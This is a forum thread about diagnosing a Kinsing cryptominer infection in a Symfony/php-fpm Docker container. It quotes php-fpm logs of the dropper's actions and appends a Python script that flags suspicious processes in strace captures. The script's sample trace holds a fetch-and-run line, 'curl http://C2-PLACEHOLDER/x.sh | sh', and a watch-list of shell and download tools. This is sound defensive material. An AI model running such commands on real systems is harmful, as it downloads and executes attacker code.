
I have - like a few dozen others - the kinsing miner in my deployment.

Unlike the others I have a minimal server with no redis installed and also no cron. The only things I've installed are symfony, php-fpm and apache in a docker environment.

However - if I start the container in my azure environment, about an hour later the process kinsing is active. In the container php-fpm is running as user apache.

The docker log says:

[26-Oct-2020 15:50:08] NOTICE: fpm is running, pid 1
[26-Oct-2020 15:50:08] NOTICE: ready to handle connections
[26-Oct-2020 15:50:08] NOTICE: systemd monitor interval set to 10000ms
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "                                 Dload  Upload   Total   Spent    Left  Speed"
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0sh: line 4: chattr: command not found"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 5: chattr: command not found"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 6: chattr: command not found"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 7: chattr: command not found"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 8: ufw: command not found"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 9: iptables: command not found"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 11: sudo: command not found"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 12: /proc/sys/kernel/nmi_watchdog: Read-only file system"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "sh: line 13: /etc/sysctl.conf: Permission denied"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "userdel: user 'akay' does not exist"
[26-Oct-2020 16:11:26] WARNING: [pool www] child 75 said into stderr: "userdel: user 'vfinder' does not exist"

In the 4th and 5th line it looks like the output of wget. But this isn't installed at all.

Now I'm getting curious - how can this Miner access my system when the "usual" ways to spread aren't installed?

My plan is to trace every file operation after starting the container until I find a two-digit sh which makes the other steps.

I couldn't install sysdig (https://github.com/draios/sysdig/wiki/How-to-Install-Sysdig-for-Linux) in the container - what alternative could I use? A tool which writes every file movement and every started process to a log would be great.

Any recommendations?

logg sar

1 Answer


@A.B curl - of course! facepalm.

After deleting curl nothing happened. No new infection.

However - I created a strace-log of the infection. In my case it's obviously the symfony framework... If anyone is interested in the log for understanding the infection path I can provide it.

Thanks for the hint. I will inform the symfony-guys and harden the connection symfony<->apache.

logg sar
  • sas I would like to have your strace-log, because I have the same problem. – MarkT Nov 04 '20 at 17:11
  • me2, in my case it was a Docker container with php-fpm 7.3, mautic (symfony framework based) and Nginx on the host system. I think it was a misconfigured Nginx conf to proxy_pass docker port 9000 for fast_cgi. Some hints I found here https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html – Andriy Gonchar Nov 20 '20 at 20:12
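Triaging the kind of strace capture the answer mentions, as an added example that is not part of the original post or of any project: it parses `strace -f -ttt -o` output of php-fpm (pid 1 in the container above), rebuilds the process tree from clone()/fork() return values, and flags shells and tools such as curl or chattr spawned beneath a php-fpm worker, exactly the pattern visible in the stderr lines of the question. SAMPLE_TRACE, the C2-PLACEHOLDER host and the /tmp path are constructed, not taken from a real capture.

```python
"""Triage an `strace -f -ttt -o trace.log` capture of php-fpm: rebuild the
process tree from clone()/fork() return values and report every execve() of a
shell or download/tamper tool that descends from a traced php-fpm pid, with
the pid chain.  SAMPLE_TRACE is constructed; the URL and path are placeholders."""
import re

SUSPICIOUS = {"sh", "bash", "dash", "curl", "wget", "chattr", "userdel", "crontab"}
# strace -f -ttt -o writes: <pid> <epoch.usec> <syscall>(<args>) = <ret> [errno text]
LINE_RE = re.compile(r"^(\d+)\s+(\d+\.\d+)\s+(\w+)\((.*)\)\s*=\s*(-?\d+|\?)")
EXECVE_RE = re.compile(r'^"([^"]+)",\s*\[(.*?)\],')  # binary path, then argv list
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

SAMPLE_TRACE = """\
1     1603727408.000100 clone(child_stack=NULL, flags=SIGCHLD, child_tidptr=0x7f01) = 75
75    1603728686.100000 clone(child_stack=NULL, flags=SIGCHLD, child_tidptr=0x7f02) = 91
91    1603728686.100500 execve("/bin/sh", ["sh", "-c", "curl http://C2-PLACEHOLDER/x.sh | sh"], 0x55d0 /* 20 vars */) = 0
91    1603728686.120000 clone(child_stack=NULL, flags=SIGCHLD, child_tidptr=0x7f03) = 92
92    1603728686.120300 execve("/usr/bin/curl", ["curl", "http://C2-PLACEHOLDER/x.sh"], 0x56a0 /* 20 vars */) = 0
91    1603728686.300000 clone(child_stack=NULL, flags=SIGCHLD, child_tidptr=0x7f04) = 93
93    1603728686.300400 execve("/usr/bin/chattr", ["chattr", "+i", "/tmp/CONSTRUCTED"], 0x56a0 /* 20 vars */) = -1 ENOENT (No such file or directory)
"""

def parse(trace):
    """Return (child_pid -> parent_pid, [(pid, ts, path, argv, ret), ...])."""
    parents, execs = {}, []
    for line in trace.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        pid, ts, call, args, ret = m.groups()
        if call in ("clone", "clone3", "fork", "vfork") and ret.isdigit():
            parents[int(ret)] = int(pid)              # the child pid is the return value
        elif call == "execve" and (e := EXECVE_RE.match(args)):
            execs.append((int(pid), float(ts), e.group(1), ARG_RE.findall(e.group(2)), ret))
    return parents, execs

def suspicious_execs(trace, root_pids=(1,)):
    """Flag execve()s of SUSPICIOUS binaries whose ancestry ends in a traced php-fpm pid."""
    parents, execs = parse(trace)
    hits = []
    for pid, ts, path, argv, ret in execs:
        chain = [pid]                                 # walk child -> parent to the root
        while chain[-1] in parents:
            chain.append(parents[chain[-1]])
        name = path.rsplit("/", 1)[-1]
        if name in SUSPICIOUS and chain[-1] in root_pids:
            hits.append({"pid": pid, "time": ts, "binary": name, "argv": argv,
                         "chain": chain, "failed": ret != "0"})
    return hits
```

To capture a real trace inside the container, attach to the master and all existing workers with `strace -f -ttt -e trace=execve,clone,fork,vfork -o trace.log -p "$(pgrep -d, php-fpm)"` (the container needs the SYS_PTRACE capability, e.g. `docker run --cap-add SYS_PTRACE`) and pass those pids as root_pids, since a worker forked before strace attached has no recorded parent.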